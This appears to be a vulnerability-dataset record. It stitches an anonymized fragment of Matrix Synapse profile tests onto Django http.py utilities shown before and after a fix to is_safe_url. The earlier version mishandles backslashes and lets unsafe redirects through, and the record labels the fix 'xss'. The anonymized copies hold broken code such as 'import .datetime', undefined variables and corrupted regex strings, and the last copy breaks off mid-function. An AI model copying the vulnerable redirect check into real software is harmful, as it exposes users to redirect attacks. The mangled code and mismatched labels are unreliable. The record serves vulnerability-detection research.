VAR_6, VAR_8="/displayname", VAR_7=access_token
)
self.request_profile(
VAR_6, VAR_8="/avatar_url", VAR_7=access_token
)
def FUNC_17(self, VAR_6, VAR_8="", VAR_7=None):
VAR_9, VAR_15 = self.make_request(
"GET", self.profile_url + VAR_8, VAR_7=access_token
)
self.assertEqual(VAR_15.code, VAR_6, VAR_15.result)
def FUNC_18(self):
try:
self.helper.leave(
room=self.room_id, user=self.requester, tok=self.requester_tok
)
except AssertionError:
pass
class CLASS_3(unittest.HomeserverTestCase):
VAR_2 = [
admin.register_servlets_for_client_rest_resource,
login.register_servlets,
profile.register_servlets,
]
def FUNC_8(self, VAR_3, VAR_4):
VAR_17 = self.default_config()
VAR_17["require_auth_for_profile_requests"] = True
VAR_17["limit_profile_requests_to_users_who_share_rooms"] = True
self.hs = self.setup_test_homeserver(VAR_17=config)
return self.hs
def FUNC_9(self, VAR_3, VAR_4, VAR_5):
self.requester = self.register_user("requester", "pass")
self.requester_tok = self.login("requester", "pass")
def FUNC_19(self):
VAR_9, VAR_15 = self.make_request(
"GET", "/profile/" + self.requester, VAR_7=self.requester_tok
)
self.assertEqual(VAR_15.code, 200, VAR_15.result)
VAR_9, VAR_15 = self.make_request(
"GET",
"/profile/" + self.requester + "/displayname",
VAR_7=self.requester_tok,
)
self.assertEqual(VAR_15.code, 200, VAR_15.result)
VAR_9, VAR_15 = self.make_request(
"GET",
"/profile/" + self.requester + "/avatar_url",
VAR_7=self.requester_tok,
)
self.assertEqual(VAR_15.code, 200, VAR_15.result)
|
import json
from mock import Mock
from twisted.internet import defer
import synapse.types
from synapse.api.errors import AuthError, SynapseError
from synapse.rest import admin
from synapse.rest.client.v1 import login, profile, room
from tests import unittest
from ....utils import MockHttpResource, setup_test_homeserver
VAR_0 = "@1234ABCD:test"
VAR_1 = "/_matrix/client/r0"
class CLASS_0(unittest.TestCase):
@defer.inlineCallbacks
def FUNC_0(self):
self.mock_resource = MockHttpResource(prefix=VAR_1)
self.mock_handler = Mock(
spec=[
"get_displayname",
"set_displayname",
"get_avatar_url",
"set_avatar_url",
"check_profile_query_allowed",
]
)
self.mock_handler.get_displayname.return_value = defer.succeed(Mock())
self.mock_handler.set_displayname.return_value = defer.succeed(Mock())
self.mock_handler.get_avatar_url.return_value = defer.succeed(Mock())
self.mock_handler.set_avatar_url.return_value = defer.succeed(Mock())
self.mock_handler.check_profile_query_allowed.return_value = defer.succeed(
Mock()
)
VAR_5 = yield setup_test_homeserver(
self.addCleanup,
"test",
federation_http_client=None,
resource_for_client=self.mock_resource,
federation=Mock(),
federation_client=Mock(),
profile_handler=self.mock_handler,
)
async def FUNC_20(VAR_9=None, VAR_10=False):
return synapse.types.create_requester(VAR_0)
VAR_5.get_auth().get_user_by_req = FUNC_20
profile.register_servlets(VAR_5, self.mock_resource)
@defer.inlineCallbacks
def FUNC_1(self):
VAR_11 = self.mock_handler.get_displayname
VAR_11.return_value = defer.succeed("Frank")
(VAR_12, VAR_13) = yield self.mock_resource.trigger(
"GET", "/profile/%s/displayname" % (VAR_0), None
)
self.assertEquals(200, VAR_12)
self.assertEquals({"displayname": "Frank"}, VAR_13)
self.assertEquals(VAR_11.call_args[0][0].localpart, "1234ABCD")
@defer.inlineCallbacks
def FUNC_2(self):
VAR_14 = self.mock_handler.set_displayname
VAR_14.return_value = defer.succeed(())
(VAR_12, VAR_13) = yield self.mock_resource.trigger(
"PUT", "/profile/%s/displayname" % (VAR_0), b'{"displayname": "Frank Jr."}'
)
self.assertEquals(200, VAR_12)
self.assertEquals(VAR_14.call_args[0][0].localpart, "1234ABCD")
self.assertEquals(VAR_14.call_args[0][1].user.localpart, "1234ABCD")
self.assertEquals(VAR_14.call_args[0][2], "Frank Jr.")
@defer.inlineCallbacks
def FUNC_3(self):
VAR_14 = self.mock_handler.set_displayname
VAR_14.side_effect = AuthError(400, "message")
(VAR_12, VAR_13) = yield self.mock_resource.trigger(
"PUT",
"/profile/%s/displayname" % ("@4567:test"),
b'{"displayname": "Frank Jr."}',
)
self.assertTrue(400 <= VAR_12 < 499, msg="code %d is in the 4xx range" % (VAR_12))
@defer.inlineCallbacks
def FUNC_4(self):
VAR_11 = self.mock_handler.get_displayname
VAR_11.return_value = defer.succeed("Bob")
(VAR_12, VAR_13) = yield self.mock_resource.trigger(
"GET", "/profile/%s/displayname" % ("@opaque:elsewhere"), None
)
self.assertEquals(200, VAR_12)
self.assertEquals({"displayname": "Bob"}, VAR_13)
@defer.inlineCallbacks
def FUNC_5(self):
VAR_14 = self.mock_handler.set_displayname
VAR_14.side_effect = SynapseError(400, "message")
(VAR_12, VAR_13) = yield self.mock_resource.trigger(
"PUT",
"/profile/%s/displayname" % ("@opaque:elsewhere"),
b'{"displayname":"bob"}',
)
self.assertTrue(400 <= VAR_12 <= 499, msg="code %d is in the 4xx range" % (VAR_12))
@defer.inlineCallbacks
def FUNC_6(self):
VAR_11 = self.mock_handler.get_avatar_url
VAR_11.return_value = defer.succeed("http://my.server/me.png")
(VAR_12, VAR_13) = yield self.mock_resource.trigger(
"GET", "/profile/%s/avatar_url" % (VAR_0), None
)
self.assertEquals(200, VAR_12)
self.assertEquals({"avatar_url": "http://my.server/me.png"}, VAR_13)
self.assertEquals(VAR_11.call_args[0][0].localpart, "1234ABCD")
@defer.inlineCallbacks
def FUNC_7(self):
VAR_14 = self.mock_handler.set_avatar_url
VAR_14.return_value = defer.succeed(())
(VAR_12, VAR_13) = yield self.mock_resource.trigger(
"PUT",
"/profile/%s/avatar_url" % (VAR_0),
b'{"avatar_url": "http://my.server/pic.gif"}',
)
self.assertEquals(200, VAR_12)
self.assertEquals(VAR_14.call_args[0][0].localpart, "1234ABCD")
self.assertEquals(VAR_14.call_args[0][1].user.localpart, "1234ABCD")
self.assertEquals(VAR_14.call_args[0][2], "http://my.server/pic.gif")
class CLASS_1(unittest.HomeserverTestCase):
VAR_2 = [
admin.register_servlets_for_client_rest_resource,
login.register_servlets,
profile.register_servlets,
]
def FUNC_8(self, VAR_3, VAR_4):
self.hs = self.setup_test_homeserver()
return self.hs
def FUNC_9(self, VAR_3, VAR_4, VAR_5):
self.owner = self.register_user("owner", "pass")
self.owner_tok = self.login("owner", "pass")
def FUNC_10(self):
VAR_9, VAR_15 = self.make_request(
"PUT",
"/profile/%s/displayname" % (self.owner,),
content=json.dumps({"displayname": "test"}),
VAR_7=self.owner_tok,
)
self.assertEqual(VAR_15.code, 200, VAR_15.result)
VAR_16 = self.get_displayname()
self.assertEqual(VAR_16, "test")
def FUNC_11(self):
VAR_9, VAR_15 = self.make_request(
"PUT",
"/profile/%s/displayname" % (self.owner,),
content=json.dumps({"displayname": "test" * 100}),
VAR_7=self.owner_tok,
)
self.assertEqual(VAR_15.code, 400, VAR_15.result)
VAR_16 = self.get_displayname()
self.assertEqual(VAR_16, "owner")
def FUNC_12(self):
VAR_9, VAR_15 = self.make_request(
"GET", "/profile/%s/displayname" % (self.owner,)
)
self.assertEqual(VAR_15.code, 200, VAR_15.result)
return VAR_15.json_body["displayname"]
class CLASS_2(unittest.HomeserverTestCase):
VAR_2 = [
admin.register_servlets_for_client_rest_resource,
login.register_servlets,
profile.register_servlets,
room.register_servlets,
]
def FUNC_8(self, VAR_3, VAR_4):
VAR_17 = self.default_config()
VAR_17["require_auth_for_profile_requests"] = True
VAR_17["limit_profile_requests_to_users_who_share_rooms"] = True
self.hs = self.setup_test_homeserver(VAR_17=config)
return self.hs
def FUNC_9(self, VAR_3, VAR_4, VAR_5):
self.owner = self.register_user("owner", "pass")
self.owner_tok = self.login("owner", "pass")
self.profile_url = "/profile/%s" % (self.owner)
self.requester = self.register_user("requester", "pass")
self.requester_tok = self.login("requester", "pass")
self.room_id = self.helper.create_room_as(self.owner, tok=self.owner_tok)
def FUNC_13(self):
self.try_fetch_profile(401)
def FUNC_14(self):
self.ensure_requester_left_room()
self.try_fetch_profile(403, VAR_7=self.requester_tok)
def FUNC_15(self):
self.ensure_requester_left_room()
self.helper.join(room=self.room_id, user=self.requester, tok=self.requester_tok)
self.try_fetch_profile(200, self.requester_tok)
def FUNC_16(self, VAR_6, VAR_7=None):
self.request_profile(VAR_6, VAR_7=access_token)
self.request_profile(
VAR_6, VAR_8="/displayname", VAR_7=access_token
)
self.request_profile(
VAR_6, VAR_8="/avatar_url", VAR_7=access_token
)
def FUNC_17(self, VAR_6, VAR_8="", VAR_7=None):
VAR_9, VAR_15 = self.make_request(
"GET", self.profile_url + VAR_8, VAR_7=access_token
)
self.assertEqual(VAR_15.code, VAR_6, VAR_15.result)
def FUNC_18(self):
try:
self.helper.leave(
room=self.room_id, user=self.requester, tok=self.requester_tok
)
except AssertionError:
pass
class CLASS_3(unittest.HomeserverTestCase):
VAR_2 = [
admin.register_servlets_for_client_rest_resource,
login.register_servlets,
profile.register_servlets,
]
def FUNC_8(self, VAR_3, VAR_4):
VAR_17 = self.default_config()
VAR_17["require_auth_for_profile_requests"] = True
VAR_17["limit_profile_requests_to_users_who_share_rooms"] = True
self.hs = self.setup_test_homeserver(VAR_17=config)
return self.hs
def FUNC_9(self, VAR_3, VAR_4, VAR_5):
self.requester = self.register_user("requester", "pass")
self.requester_tok = self.login("requester", "pass")
def FUNC_19(self):
VAR_9, VAR_15 = self.make_request(
"GET", "/profile/" + self.requester, VAR_7=self.requester_tok
)
self.assertEqual(VAR_15.code, 200, VAR_15.result)
VAR_9, VAR_15 = self.make_request(
"GET",
"/profile/" + self.requester + "/displayname",
VAR_7=self.requester_tok,
)
self.assertEqual(VAR_15.code, 200, VAR_15.result)
VAR_9, VAR_15 = self.make_request(
"GET",
"/profile/" + self.requester + "/avatar_url",
VAR_7=self.requester_tok,
)
self.assertEqual(VAR_15.code, 200, VAR_15.result)
| [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
15,
18,
20,
22,
27,
29,
31,
34,
35,
38,
41,
54,
62,
72,
75,
77,
79,
84,
88,
92,
97,
101,
106,
111,
117,
119,
124,
128,
131,
136,
142,
144,
149,
153,
157,
162,
168,
173,
174,
176,
182,
186,
190,
199,
202,
212,
215,
222,
223,
225,
232,
234,
239,
241,
243,
247,
248,
251,
253,
256,
259,
261,
264,
266,
268,
271,
275,
279,
285,
292,
293,
294,
296,
297,
299,
305,
311,
313,
315,
318,
327,
334,
341,
16,
37,
38,
39,
40,
204,
320,
321,
322
] | [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
15,
18,
20,
22,
27,
29,
31,
34,
35,
38,
41,
54,
62,
72,
75,
77,
79,
84,
88,
92,
97,
101,
106,
111,
117,
119,
124,
128,
131,
136,
142,
144,
149,
153,
157,
162,
168,
173,
174,
176,
182,
186,
190,
199,
202,
212,
215,
222,
223,
225,
232,
234,
239,
241,
243,
247,
248,
251,
253,
256,
259,
261,
264,
266,
268,
271,
275,
279,
285,
292,
293,
294,
296,
297,
299,
305,
311,
313,
315,
318,
327,
334,
341,
16,
37,
38,
39,
40,
204,
320,
321,
322
] |
1CWE-79
| from __future__ import unicode_literals
import base64
import calendar
import datetime
import re
import sys
import unicodedata
from binascii import Error as BinasciiError
from email.utils import formatdate
from django.utils import six
from django.utils.datastructures import MultiValueDict
from django.utils.encoding import force_bytes, force_str, force_text
from django.utils.functional import keep_lazy_text
from django.utils.six.moves.urllib.parse import (
quote, quote_plus, unquote, unquote_plus, urlencode as original_urlencode,
urlparse,
)
ETAG_MATCH = re.compile(r'(?:W/)?"((?:\\.|[^"])*)"')
MONTHS = 'jan feb mar apr may jun jul aug sep oct nov dec'.split()
__D = r'(?P<day>\d{2})'
__D2 = r'(?P<day>[ \d]\d)'
__M = r'(?P<mon>\w{3})'
__Y = r'(?P<year>\d{4})'
__Y2 = r'(?P<year>\d{2})'
__T = r'(?P<hour>\d{2}):(?P<min>\d{2}):(?P<sec>\d{2})'
RFC1123_DATE = re.compile(r'^\w{3}, %s %s %s %s GMT$' % (__D, __M, __Y, __T))
RFC850_DATE = re.compile(r'^\w{6,9}, %s-%s-%s %s GMT$' % (__D, __M, __Y2, __T))
ASCTIME_DATE = re.compile(r'^\w{3} %s %s %s %s$' % (__M, __D2, __T, __Y))
RFC3986_GENDELIMS = str(":/?#[]@")
RFC3986_SUBDELIMS = str("!$&'()*+,;=")
PROTOCOL_TO_PORT = {
'http': 80,
'https': 443,
}
@keep_lazy_text
def urlquote(url, safe='/'):
"""
A version of Python's urllib.quote() function that can operate on unicode
strings. The url is first UTF-8 encoded before quoting. The returned string
can safely be used as part of an argument to a subsequent iri_to_uri() call
without double-quoting occurring.
"""
return force_text(quote(force_str(url), force_str(safe)))
@keep_lazy_text
def urlquote_plus(url, safe=''):
"""
A version of Python's urllib.quote_plus() function that can operate on
unicode strings. The url is first UTF-8 encoded before quoting. The
returned string can safely be used as part of an argument to a subsequent
iri_to_uri() call without double-quoting occurring.
"""
return force_text(quote_plus(force_str(url), force_str(safe)))
@keep_lazy_text
def urlunquote(quoted_url):
"""
A wrapper for Python's urllib.unquote() function that can operate on
the result of django.utils.http.urlquote().
"""
return force_text(unquote(force_str(quoted_url)))
@keep_lazy_text
def urlunquote_plus(quoted_url):
"""
A wrapper for Python's urllib.unquote_plus() function that can operate on
the result of django.utils.http.urlquote_plus().
"""
return force_text(unquote_plus(force_str(quoted_url)))
def urlencode(query, doseq=0):
"""
A version of Python's urllib.urlencode() function that can operate on
unicode strings. The parameters are first cast to UTF-8 encoded strings and
then encoded as per normal.
"""
if isinstance(query, MultiValueDict):
query = query.lists()
elif hasattr(query, 'items'):
query = query.items()
return original_urlencode(
[(force_str(k),
[force_str(i) for i in v] if isinstance(v, (list, tuple)) else force_str(v))
for k, v in query],
doseq)
def cookie_date(epoch_seconds=None):
"""
Formats the time to ensure compatibility with Netscape's cookie standard.
Accepts a floating point number expressed in seconds since the epoch, in
UTC - such as that outputted by time.time(). If set to None, defaults to
the current time.
Outputs a string in the format 'Wdy, DD-Mon-YYYY HH:MM:SS GMT'.
"""
rfcdate = formatdate(epoch_seconds)
return '%s-%s-%s GMT' % (rfcdate[:7], rfcdate[8:11], rfcdate[12:25])
def http_date(epoch_seconds=None):
"""
Formats the time to match the RFC1123 date format as specified by HTTP
RFC2616 section 3.3.1.
Accepts a floating point number expressed in seconds since the epoch, in
UTC - such as that outputted by time.time(). If set to None, defaults to
the current time.
Outputs a string in the format 'Wdy, DD Mon YYYY HH:MM:SS GMT'.
"""
return formatdate(epoch_seconds, usegmt=True)
def parse_http_date(date):
"""
Parses a date format as specified by HTTP RFC2616 section 3.3.1.
The three formats allowed by the RFC are accepted, even if only the first
one is still in widespread use.
Returns an integer expressed in seconds since the epoch, in UTC.
"""
# emails.Util.parsedate does the job for RFC1123 dates; unfortunately
# RFC2616 makes it mandatory to support RFC850 dates too. So we roll
# our own RFC-compliant parsing.
for regex in RFC1123_DATE, RFC850_DATE, ASCTIME_DATE:
m = regex.match(date)
if m is not None:
break
else:
raise ValueError("%r is not in a valid HTTP date format" % date)
try:
year = int(m.group('year'))
if year < 100:
if year < 70:
year += 2000
else:
year += 1900
month = MONTHS.index(m.group('mon').lower()) + 1
day = int(m.group('day'))
hour = int(m.group('hour'))
min = int(m.group('min'))
sec = int(m.group('sec'))
result = datetime.datetime(year, month, day, hour, min, sec)
return calendar.timegm(result.utctimetuple())
except Exception:
six.reraise(ValueError, ValueError("%r is not a valid date" % date), sys.exc_info()[2])
def parse_http_date_safe(date):
"""
Same as parse_http_date, but returns None if the input is invalid.
"""
try:
return parse_http_date(date)
except Exception:
pass
# Base 36 functions: useful for generating compact URLs
def base36_to_int(s):
"""
Converts a base 36 string to an ``int``. Raises ``ValueError` if the
input won't fit into an int.
"""
# To prevent overconsumption of server resources, reject any
# base36 string that is long than 13 base36 digits (13 digits
# is sufficient to base36-encode any 64-bit integer)
if len(s) > 13:
raise ValueError("Base36 input too large")
value = int(s, 36)
# ... then do a final check that the value will fit into an int to avoid
# returning a long (#15067). The long type was removed in Python 3.
if six.PY2 and value > sys.maxint:
raise ValueError("Base36 input too large")
return value
def int_to_base36(i):
"""
Converts an integer to a base36 string
"""
char_set = '0123456789abcdefghijklmnopqrstuvwxyz'
if i < 0:
raise ValueError("Negative base36 conversion input.")
if six.PY2:
if not isinstance(i, six.integer_types):
raise TypeError("Non-integer base36 conversion input.")
if i > sys.maxint:
raise ValueError("Base36 conversion input too large.")
if i < 36:
return char_set[i]
b36 = ''
while i != 0:
i, n = divmod(i, 36)
b36 = char_set[n] + b36
return b36
def urlsafe_base64_encode(s):
"""
Encodes a bytestring in base64 for use in URLs, stripping any trailing
equal signs.
"""
return base64.urlsafe_b64encode(s).rstrip(b'\n=')
def urlsafe_base64_decode(s):
"""
Decodes a base64 encoded string, adding back any trailing equal signs that
might have been stripped.
"""
s = force_bytes(s)
try:
return base64.urlsafe_b64decode(s.ljust(len(s) + len(s) % 4, b'='))
except (LookupError, BinasciiError) as e:
raise ValueError(e)
def parse_etags(etag_str):
"""
Parses a string with one or several etags passed in If-None-Match and
If-Match headers by the rules in RFC 2616. Returns a list of etags
without surrounding double quotes (") and unescaped from \<CHAR>.
"""
etags = ETAG_MATCH.findall(etag_str)
if not etags:
# etag_str has wrong format, treat it as an opaque string then
return [etag_str]
etags = [e.encode('ascii').decode('unicode_escape') for e in etags]
return etags
def quote_etag(etag):
"""
Wraps a string in double quotes escaping contents as necessary.
"""
return '"%s"' % etag.replace('\\', '\\\\').replace('"', '\\"')
def unquote_etag(etag):
"""
Unquote an ETag string; i.e. revert quote_etag().
"""
return etag.strip('"').replace('\\"', '"').replace('\\\\', '\\') if etag else etag
def is_same_domain(host, pattern):
"""
Return ``True`` if the host is either an exact match or a match
to the wildcard pattern.
Any pattern beginning with a period matches a domain and all of its
subdomains. (e.g. ``.example.com`` matches ``example.com`` and
``foo.example.com``). Anything else is an exact string match.
"""
if not pattern:
return False
pattern = pattern.lower()
return (
pattern[0] == '.' and (host.endswith(pattern) or host == pattern[1:]) or
pattern == host
)
def is_safe_url(url, host=None):
"""
Return ``True`` if the url is a safe redirection (i.e. it doesn't point to
a different host and uses a safe scheme).
Always returns ``False`` on an empty url.
"""
if url is not None:
url = url.strip()
if not url:
return False
# Chrome treats \ completely as /
url = url.replace('\\', '/')
# Chrome considers any URL with more than two slashes to be absolute, but
# urlparse is not so flexible. Treat any url with three slashes as unsafe.
if url.startswith('///'):
return False
url_info = urlparse(url)
# Forbid URLs like http:///example.com - with a scheme, but without a hostname.
# In that URL, example.com is not the hostname but, a path component. However,
# Chrome will still consider example.com to be the hostname, so we must not
# allow this syntax.
if not url_info.netloc and url_info.scheme:
return False
# Forbid URLs that start with control characters. Some browsers (like
# Chrome) ignore quite a few control characters at the start of a
# URL and might consider the URL as scheme relative.
if unicodedata.category(url[0])[0] == 'C':
return False
return ((not url_info.netloc or url_info.netloc == host) and
(not url_info.scheme or url_info.scheme in ['http', 'https']))
| from __future__ import unicode_literals
import base64
import calendar
import datetime
import re
import sys
import unicodedata
from binascii import Error as BinasciiError
from email.utils import formatdate
from django.utils import six
from django.utils.datastructures import MultiValueDict
from django.utils.encoding import force_bytes, force_str, force_text
from django.utils.functional import keep_lazy_text
from django.utils.six.moves.urllib.parse import (
quote, quote_plus, unquote, unquote_plus, urlencode as original_urlencode,
urlparse,
)
ETAG_MATCH = re.compile(r'(?:W/)?"((?:\\.|[^"])*)"')
MONTHS = 'jan feb mar apr may jun jul aug sep oct nov dec'.split()
__D = r'(?P<day>\d{2})'
__D2 = r'(?P<day>[ \d]\d)'
__M = r'(?P<mon>\w{3})'
__Y = r'(?P<year>\d{4})'
__Y2 = r'(?P<year>\d{2})'
__T = r'(?P<hour>\d{2}):(?P<min>\d{2}):(?P<sec>\d{2})'
RFC1123_DATE = re.compile(r'^\w{3}, %s %s %s %s GMT$' % (__D, __M, __Y, __T))
RFC850_DATE = re.compile(r'^\w{6,9}, %s-%s-%s %s GMT$' % (__D, __M, __Y2, __T))
ASCTIME_DATE = re.compile(r'^\w{3} %s %s %s %s$' % (__M, __D2, __T, __Y))
RFC3986_GENDELIMS = str(":/?#[]@")
RFC3986_SUBDELIMS = str("!$&'()*+,;=")
PROTOCOL_TO_PORT = {
'http': 80,
'https': 443,
}
@keep_lazy_text
def urlquote(url, safe='/'):
"""
A version of Python's urllib.quote() function that can operate on unicode
strings. The url is first UTF-8 encoded before quoting. The returned string
can safely be used as part of an argument to a subsequent iri_to_uri() call
without double-quoting occurring.
"""
return force_text(quote(force_str(url), force_str(safe)))
@keep_lazy_text
def urlquote_plus(url, safe=''):
"""
A version of Python's urllib.quote_plus() function that can operate on
unicode strings. The url is first UTF-8 encoded before quoting. The
returned string can safely be used as part of an argument to a subsequent
iri_to_uri() call without double-quoting occurring.
"""
return force_text(quote_plus(force_str(url), force_str(safe)))
@keep_lazy_text
def urlunquote(quoted_url):
"""
A wrapper for Python's urllib.unquote() function that can operate on
the result of django.utils.http.urlquote().
"""
return force_text(unquote(force_str(quoted_url)))
@keep_lazy_text
def urlunquote_plus(quoted_url):
"""
A wrapper for Python's urllib.unquote_plus() function that can operate on
the result of django.utils.http.urlquote_plus().
"""
return force_text(unquote_plus(force_str(quoted_url)))
def urlencode(query, doseq=0):
"""
A version of Python's urllib.urlencode() function that can operate on
unicode strings. The parameters are first cast to UTF-8 encoded strings and
then encoded as per normal.
"""
if isinstance(query, MultiValueDict):
query = query.lists()
elif hasattr(query, 'items'):
query = query.items()
return original_urlencode(
[(force_str(k),
[force_str(i) for i in v] if isinstance(v, (list, tuple)) else force_str(v))
for k, v in query],
doseq)
def cookie_date(epoch_seconds=None):
"""
Formats the time to ensure compatibility with Netscape's cookie standard.
Accepts a floating point number expressed in seconds since the epoch, in
UTC - such as that outputted by time.time(). If set to None, defaults to
the current time.
Outputs a string in the format 'Wdy, DD-Mon-YYYY HH:MM:SS GMT'.
"""
rfcdate = formatdate(epoch_seconds)
return '%s-%s-%s GMT' % (rfcdate[:7], rfcdate[8:11], rfcdate[12:25])
def http_date(epoch_seconds=None):
"""
Formats the time to match the RFC1123 date format as specified by HTTP
RFC2616 section 3.3.1.
Accepts a floating point number expressed in seconds since the epoch, in
UTC - such as that outputted by time.time(). If set to None, defaults to
the current time.
Outputs a string in the format 'Wdy, DD Mon YYYY HH:MM:SS GMT'.
"""
return formatdate(epoch_seconds, usegmt=True)
def parse_http_date(date):
"""
Parses a date format as specified by HTTP RFC2616 section 3.3.1.
The three formats allowed by the RFC are accepted, even if only the first
one is still in widespread use.
Returns an integer expressed in seconds since the epoch, in UTC.
"""
# emails.Util.parsedate does the job for RFC1123 dates; unfortunately
# RFC2616 makes it mandatory to support RFC850 dates too. So we roll
# our own RFC-compliant parsing.
for regex in RFC1123_DATE, RFC850_DATE, ASCTIME_DATE:
m = regex.match(date)
if m is not None:
break
else:
raise ValueError("%r is not in a valid HTTP date format" % date)
try:
year = int(m.group('year'))
if year < 100:
if year < 70:
year += 2000
else:
year += 1900
month = MONTHS.index(m.group('mon').lower()) + 1
day = int(m.group('day'))
hour = int(m.group('hour'))
min = int(m.group('min'))
sec = int(m.group('sec'))
result = datetime.datetime(year, month, day, hour, min, sec)
return calendar.timegm(result.utctimetuple())
except Exception:
six.reraise(ValueError, ValueError("%r is not a valid date" % date), sys.exc_info()[2])
def parse_http_date_safe(date):
"""
Same as parse_http_date, but returns None if the input is invalid.
"""
try:
return parse_http_date(date)
except Exception:
pass
# Base 36 functions: useful for generating compact URLs
def base36_to_int(s):
"""
Converts a base 36 string to an ``int``. Raises ``ValueError` if the
input won't fit into an int.
"""
# To prevent overconsumption of server resources, reject any
# base36 string that is long than 13 base36 digits (13 digits
# is sufficient to base36-encode any 64-bit integer)
if len(s) > 13:
raise ValueError("Base36 input too large")
value = int(s, 36)
# ... then do a final check that the value will fit into an int to avoid
# returning a long (#15067). The long type was removed in Python 3.
if six.PY2 and value > sys.maxint:
raise ValueError("Base36 input too large")
return value
def int_to_base36(i):
"""
Converts an integer to a base36 string
"""
char_set = '0123456789abcdefghijklmnopqrstuvwxyz'
if i < 0:
raise ValueError("Negative base36 conversion input.")
if six.PY2:
if not isinstance(i, six.integer_types):
raise TypeError("Non-integer base36 conversion input.")
if i > sys.maxint:
raise ValueError("Base36 conversion input too large.")
if i < 36:
return char_set[i]
b36 = ''
while i != 0:
i, n = divmod(i, 36)
b36 = char_set[n] + b36
return b36
def urlsafe_base64_encode(s):
"""
Encodes a bytestring in base64 for use in URLs, stripping any trailing
equal signs.
"""
return base64.urlsafe_b64encode(s).rstrip(b'\n=')
def urlsafe_base64_decode(s):
"""
Decodes a base64 encoded string, adding back any trailing equal signs that
might have been stripped.
"""
s = force_bytes(s)
try:
return base64.urlsafe_b64decode(s.ljust(len(s) + len(s) % 4, b'='))
except (LookupError, BinasciiError) as e:
raise ValueError(e)
def parse_etags(etag_str):
"""
Parses a string with one or several etags passed in If-None-Match and
If-Match headers by the rules in RFC 2616. Returns a list of etags
without surrounding double quotes (") and unescaped from \<CHAR>.
"""
etags = ETAG_MATCH.findall(etag_str)
if not etags:
# etag_str has wrong format, treat it as an opaque string then
return [etag_str]
etags = [e.encode('ascii').decode('unicode_escape') for e in etags]
return etags
def quote_etag(etag):
"""
Wraps a string in double quotes escaping contents as necessary.
"""
return '"%s"' % etag.replace('\\', '\\\\').replace('"', '\\"')
def unquote_etag(etag):
"""
Unquote an ETag string; i.e. revert quote_etag().
"""
return etag.strip('"').replace('\\"', '"').replace('\\\\', '\\') if etag else etag
def is_same_domain(host, pattern):
"""
Return ``True`` if the host is either an exact match or a match
to the wildcard pattern.
Any pattern beginning with a period matches a domain and all of its
subdomains. (e.g. ``.example.com`` matches ``example.com`` and
``foo.example.com``). Anything else is an exact string match.
"""
if not pattern:
return False
pattern = pattern.lower()
return (
pattern[0] == '.' and (host.endswith(pattern) or host == pattern[1:]) or
pattern == host
)
def is_safe_url(url, host=None):
"""
Return ``True`` if the url is a safe redirection (i.e. it doesn't point to
a different host and uses a safe scheme).
Always returns ``False`` on an empty url.
"""
if url is not None:
url = url.strip()
if not url:
return False
# Chrome treats \ completely as / in paths but it could be part of some
# basic auth credentials so we need to check both URLs.
return _is_safe_url(url, host) and _is_safe_url(url.replace('\\', '/'), host)
def _is_safe_url(url, host):
# Chrome considers any URL with more than two slashes to be absolute, but
# urlparse is not so flexible. Treat any url with three slashes as unsafe.
if url.startswith('///'):
return False
url_info = urlparse(url)
# Forbid URLs like http:///example.com - with a scheme, but without a hostname.
# In that URL, example.com is not the hostname but, a path component. However,
# Chrome will still consider example.com to be the hostname, so we must not
# allow this syntax.
if not url_info.netloc and url_info.scheme:
return False
# Forbid URLs that start with control characters. Some browsers (like
# Chrome) ignore quite a few control characters at the start of a
# URL and might consider the URL as scheme relative.
if unicodedata.category(url[0])[0] == 'C':
return False
return ((not url_info.netloc or url_info.netloc == host) and
(not url_info.scheme or url_info.scheme in ['http', 'https']))
| xss | {
"code": [
" url = url.replace('\\\\', '/')"
],
"line_no": [
294
]
} | {
"code": [
"def _is_safe_url(url, host):"
],
"line_no": [
298
]
} | from __future__ import unicode_literals
import base64
import calendar
import .datetime
import re
import .sys
import unicodedata
from binascii import Error as BinasciiError
from email.utils import formatdate
from django.utils import .six
from django.utils.datastructures import MultiValueDict
from django.utils.encoding import force_bytes, force_str, force_text
from django.utils.functional import keep_lazy_text
from django.utils.six.moves.urllib.parse import (
quote, quote_plus, unquote, unquote_plus, FUNC_4 as original_urlencode,
urlparse,
)
VAR_0 = re.compile(r'(?:W/)?"((?:\\.|[^"])*)"')
VAR_1 = 'jan feb mar apr may jun jul aug sep oct nov dec'.split()
VAR_2 = r'(?P<VAR_36>\d{2})'
VAR_3 = r'(?P<VAR_36>[ \d]\d)'
VAR_4 = r'(?P<mon>\w{3})'
VAR_5 = r'(?P<VAR_34>\d{4})'
VAR_6 = r'(?P<VAR_34>\d{2})'
VAR_7 = r'(?P<VAR_37>\d{2}):(?P<VAR_38>\d{2}):(?P<VAR_39>\d{2})'
VAR_8 = re.compile(r'^\w{3}, %VAR_21 %VAR_21 %VAR_21 %s GMT$' % (VAR_2, VAR_4, VAR_5, VAR_7))
VAR_9 = re.compile(r'^\w{6,9}, %VAR_21-%VAR_21-%VAR_21 %s GMT$' % (VAR_2, VAR_4, VAR_6, VAR_7))
VAR_10 = re.compile(r'^\w{3} %VAR_21 %VAR_21 %VAR_21 %s$' % (VAR_4, VAR_3, VAR_7, VAR_5))
VAR_11 = str(":/?#[]@")
VAR_12 = str("!$&'()*+,;=")
VAR_13 = {
'http': 80,
'https': 443,
}
@keep_lazy_text
def FUNC_0(VAR_14, VAR_15='/'):
return force_text(quote(force_str(VAR_14), force_str(VAR_15)))
@keep_lazy_text
def FUNC_1(VAR_14, VAR_15=''):
return force_text(quote_plus(force_str(VAR_14), force_str(VAR_15)))
@keep_lazy_text
def FUNC_2(VAR_16):
return force_text(unquote(force_str(VAR_16)))
@keep_lazy_text
def FUNC_3(VAR_16):
return force_text(unquote_plus(force_str(VAR_16)))
def FUNC_4(VAR_17, VAR_18=0):
if isinstance(VAR_17, MultiValueDict):
VAR_17 = query.lists()
elif hasattr(VAR_17, 'items'):
VAR_17 = query.items()
return original_urlencode(
[(force_str(k),
[force_str(VAR_22) for VAR_22 in v] if isinstance(v, (list, tuple)) else force_str(v))
for k, v in VAR_17],
VAR_18)
def FUNC_5(VAR_19=None):
VAR_27 = formatdate(VAR_19)
return '%VAR_21-%s-%VAR_21 GMT' % (VAR_27[:7], VAR_27[8:11], VAR_27[12:25])
def FUNC_6(VAR_19=None):
return formatdate(VAR_19, usegmt=True)
def FUNC_7(VAR_20):
for regex in VAR_8, VAR_9, VAR_10:
VAR_33 = regex.match(VAR_20)
